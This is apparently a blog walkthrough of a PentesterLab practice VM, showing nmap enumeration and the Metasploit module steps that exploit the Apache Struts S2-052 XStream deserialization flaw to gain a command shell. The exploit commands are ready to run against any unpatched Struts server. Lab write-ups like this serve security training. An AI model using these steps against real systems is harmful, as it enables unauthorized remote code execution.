Hello
friend!! Today we are going to exploit another VM lab which is designed by
Pentester Lab covers the exploitation of the Struts S2-052 vulnerability. The
REST Plugin is using a XStreamHandler with an instance of XStream for
deserialization without any type filtering and this can lead to Remote Code
Execution when deserializing XML payloads.
Source: https://cwiki.apache.org/confluence/display/WW/S2-052
Table of content
§
Introduction
§
Download VM
§
Enumeration
(Nmap)
§ Surfing
Port 80
§
Exploit the
target (Metasploit)
Let’s Exploit!!
Download
it from here and run
this VM. Then check its network configuration through ifconfig command.
Since target belongs to 192.168.1.103 network, let’s go for
its enumeration with help of nmap following command to identify running service
and version.
nmap -A 192.168.1.103
From nmap scanning result we enumerated following details:
Http-server-header: Apache-coyote/1.1
Http-title: orders
Requested resource: /order.xhtml
So when we have explored /order.xhtml through the web browser it put up following webpage.
Further, we explore user Bob it brings us inside order3 web
page.
Since the author has already
declared that is vm is vulnerable to the Struts S2-052 therefore with the help
of following module of metasploit we can directly exploit it to obtain command
shell of target vm.
msf > use
exploit/multi/http/struts2_rest_xstream
msf
exploit(multi/http/struts2_rest_xstream) > set rhost 192.168.1.103
msf
exploit(multi/http/struts2_rest_xstream) > set rport 80
msf
exploit(multi/http/struts2_rest_xstream) > set TARGETURI /orders/3
msf
exploit(multi/http/struts2_rest_xstream) > exploit
BOOOOOOM!!! Here we owned the command
shell of victim’s vm.
0 comments:
Post a Comment